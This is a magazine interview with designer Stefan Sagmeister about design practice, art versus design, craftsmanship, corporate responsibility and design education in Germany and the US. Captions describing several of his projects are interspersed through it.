    The Grammy award-winning design of this album features happy, angry, sad and content David Byrne dolls.

    He advocates keeping it simple, which he believes has huge benefits and routinely takes a sabbatical break every seven years to recharge and reflect creatively.

    This timeless interview, previously unpublished in English, was conducted by Spyros Zevelakis when he met Sagmeister at TypoBerlin ‘Image’ in 2008.

    Stefan_Sagmeister ©

    Q: Do we have to gather in the economic centres of the world in order to do better graphic design?

    Design by its very definition, not only communication design but also product design, is, from a broader point of view, about the interaction of humans. Now, you have more interactions of humans in cities: bigger concentration, much higher density than you’d have in the countryside. Consequently, as a designer, I’m invited a lot to different places around the world, and they’re almost without exception cities. So, cities see not just much higher usage of design and products, but also more of the making of them, and of the thinking about them.

    At the same time, though, technology allows us to do fantastic work anywhere. And this is true for young designers. I’ve seen colleges outside of cities doing amazing work that uses the remoteness as part of their limitations [as designers] and turns it to their advantage. I’ve also seen design companies in provincial areas that do brilliant work.

    Q: So, in the years to come, will designers be more able to live anywhere and do work anywhere?

    In a sense, I would say yes, because you can technically do it. But, obviously, the density of information and experiences will probably remain higher in the cities than in the countryside. So, I could see this working beautifully for a limited period of time, and I’m actually going to move to the countryside for a year to do exactly that: try a different style of working. I will be in Indonesia, quite far away from any urban centre; I’d have to fly to Jakarta or Singapore. That’ll be for a year, but I don’t think that I’d want to do this for the rest of my life.

    Everybody always thinks they are right.
    Illustrated by Monika Aichele in Germany and built by Sportogo in California, the monkeys each held a banner containing one word of the sentence; the whole sentiment was completed only for a viewer visiting all the cities, or through the media.

    Q: Was there a point in your career at which you managed to start working on your own terms? Was it difficult in the beginning?

    From a single point of view, even as a student, I looked for jobs that allowed work that I thought was good. And for sure, when we started the studio, right from the start we tried to do work that we could be satisfied with. That’s what I felt was best to do. I don’t think that you can open a studio and do mediocre work to make money and somehow switch over to good stuff. I haven’t seen it happen. Because everything that they [your clients] do reflects on everything that you do. If you do a lot of mediocre work, it’s going to attract a lot of mediocre clients.

    Q: Were there sacrifices you had to make to allow yourself this freedom?

    There were not many sacrifices involved. What I did was design a situation for myself where the studio would need very little money. Our overheads were very, very small, so we didn’t get into this “difficulty” of having to have a lot of income coming in and then having to take on jobs that we wouldn’t be happy with.

    The new EDP identity.
    The new EDP identity is built using four fundamental shapes: a circle, a half circle, a square and a triangle. These four shapes were combined and layered to build 85 unique EDP logomarks, resulting in a modular identity.

    Q: Are you bothered about the distinctions between the arts and design?

    As a consumer or viewer of art and design, I don’t care. As a consumer, my question is whether it’s good or not, not whether it’s art or design. As a do-er [creator/maker of it], somehow I have to care. I’ve been asked about it here and there… and on a daily basis there is a distinction as far as the media, distribution methods and functionality of the pieces are concerned. I think that design pieces at large need to be functional, while art pieces at large don’t have to be functional; they just have to be. They don’t have to actually do anything.

    Q: In this way you differentiate your work from a fine artist’s work?

    Yes, exactly.

    The billboard for the Experimenta in Lisbon is made out of newsprint paper. We took advantage of the fact that newsprint yellows significantly in the sun.

    Q: Designers are active in the discussion of more ethical and responsible practice. Many seek to work for clients committed to social responsibility (charities etc.). In general, however, the designer works for industry, and it may often be questionable how seriously big corporations take contemporary issues (like sustainability) outside their PR and marketing agenda. What’s your view on this contradiction? On the one hand, designers are sensitive to these issues; on the other, they do best in strong economies (capitalism).

    I’m not sure I have very interesting things to say about it. I do believe that it’s going to be some middle ground between the two. I think that capitalism found that middle ground long ago. I talked yesterday to a woman who works at Mercedes. She said that they are investing $14 billion over the next three years in environmentally friendly technology. That is so much money from this company that I actually didn’t believe her at first, and then she emailed her boss to get the actual numbers. Mercedes’s annual profit is $4 billion. So to put [nearly] three years’ worth of profits solely into environmentally friendly technologies…

    I would like to see the design company that puts its entire profit into the same thing. It seems to me, if those numbers prove to be true, that some big industry people are much more responsible than the design community. I do see big businesses having some quite inspiring leadership. Therefore, I don’t see that one has to go above the other. In general, I’m a big believer in the human spirit, and I think that, century after century, we are actually getting better and better. Looking at our past and our progress, it seems that we have a good future. I’m not sure that the PR and marketing of big corporations is the sole driver for a more responsible approach.

    On the other hand, I have seen the design community react to catastrophes in the most superficial and silly fashion. I remember, back at 9/11, the overall response of the design community in New York was to design stupid logos and upload them to the AIGA website. But I do know a lawyer who organised the law community; they did actual beneficial things for their communities. I don’t think that the design community can claim at all to have leadership in any of these subjects. And even though it’s quite fashionable to slag off large corporations, I sometimes see a much more efficient, much more professional and effective way of working from them than from individual designers.

    Identity and packaging design for Aishti, Aizone, and Minis department stores.

    Q: Back to graphics, you’re a letterer and you enjoy the craftsmanship. Is it equally important for you, the form of the letterforms and the medium (that dictates the outcome)?

    Both, yes. Actually, even when we produce something that is made out of a particular material, the form is not totally driven by that one medium. I’ll give an example: when we did the word “limits” swimming around in the swimming pool, we sketched it out beforehand, because I didn’t want the air-conditioning tubing material that we made it from to solely dictate the form of that work.

    Q: Is craftsmanship a way to be unique in the digital era?

    Well, I think it was, maybe 10 years ago. Specifically, when modernism first came back and everything was suddenly cold and machine-like, it made a lot of sense to introduce handwriting, but also a higher level of craft. Right now, craft in almost all artistic directions is a very hot topic. It starts with product design, but in art, too, craft is coming back big time: you see the German painters who can actually paint having unbelievable careers. We went through such a long period, maybe two or three decades, where craft didn’t play a role at all, and I mean consciously it didn’t. People who could paint consciously did not paint.

    In general, craft is just a function of knowing your tools really well. Knowing your tools very well can be an advantage. On the other hand, I’ve also seen people so hooked on the tools they know so well that they stay in their small little section [world] and can’t really get out to see the bigger picture. Personally, I’m most comfortable going in and out.

    A wall of bananas
    “At the opening of our exhibition at Deitch Projects in New York we featured a wall of 10,000 bananas. Green bananas created a pattern against a background of yellow bananas spelling out the sentiment: Self-confidence produces fine results. After a number of days the green bananas turned yellow too and the type disappeared. When the yellow background bananas turned brown, the type (and the self-confidence) appeared again, only to go away when all bananas turned brown.” – Stefan Sagmeister

    Q: Art colleges in Europe don’t seem to teach much craft any more, do they?

    In design education, they are much more about what the world does right now. Interestingly, in most graduate schools, being technically good at something is almost a bad word if you’re talking about contemporary craft. Somebody who is very good in Photoshop is almost universally despised at a grad school. It’s silly. I’m not saying that I’m a friend of people who can do just that and can’t think, but I think a combination of skills matters.

    Q: Where do you think design education is going?

    I could only give you a superficial answer, simply because colleges are a very vast system. There are colleges and universities that do a fantastic job. I just came back from the Royal College of Art in London, where I saw the work of six design students, and five of them were fantastic: work of a very high level. I also see people in Holland doing work that, I can assure you, is far more advanced than anything I was thinking of when I was 23. Much more sophisticated. Their education is so much better; they know much more, they have much more experience than I had at that age. I’m not quite sure why this is. Is it because I have the chance to see these people now? Or because I just never met them when I was 23? But then I see the opposite: people who are being taught by bad professors, and they’re not that successful. So there is a very wide spectrum out there, and if I were a student now, I would have to do some serious research. Which is relatively easy to do: just look at the work of the graduate students; you can tell immediately.

    Talkative Chair.
    The text of this chair simply refers to a diary entry written while sitting on our balcony in Bali, where the chair itself would ultimately be placed.

    Q: So, do you think that it depends massively on the school and their practice or philosophy, or the country of study?

    Oh no, of course there are a couple of star schools across the world, and there are some countries that have really figured out design education, Germany being one of them. If I had to pick one place, anywhere in the world, where I can see the most, I’d think of Germany. Considering that these four or five schools don’t refer to themselves as being the best… I think education here (in Germany) is fantastic! If I lived in a country like the US, where art education is unbelievably expensive, I’d probably go through the trouble of learning the German language and getting my education here. I know that there are protests here because students now pay €500 a semester. But you pay $18,000 a semester in the US. And the education is really good. I talked to teachers who are very good designers, and the government pays them salaries such that they can give up a part of their practice, and it’s actually doable.

    In the US, if you teach, you do it as a hobby. I do teach three hours a week, but I can’t be available to my students during the week. I just talked to [a designer who] I think is the best poster designer alive. He’s teaching in Stuttgart, and he has all he needs, [which] allows him to leave a part of his practice and take teaching seriously. And he does that. And you see the outcome, because he’s available to his students. By contrast, in the US and many other countries, you have to do either teaching or design. Although there are great designers also teaching full time, you have mediocre [medium-level] designers who become full-time faculty staff.

    This may be a generalization, but you certainly have people who flee to academia because they’re not that good in real life. Then, of course, they will have the time to lead the students. At the same time, people who are very good outside can only come in occasionally. That’s why I think the current system here seems to work brilliantly, where very good designers can dedicate a serious amount of their lives to teaching.

    Trying to Look Good Limits My Life.
    Trying to Look Good Limits My Life: real-world typography produced by Sagmeister for one of his personally driven projects.

    Be sure to check out the Sagmeister studio live via the website.

    (jc) (il)

    © Spyros Zevelakis for Smashing Magazine, 2012.
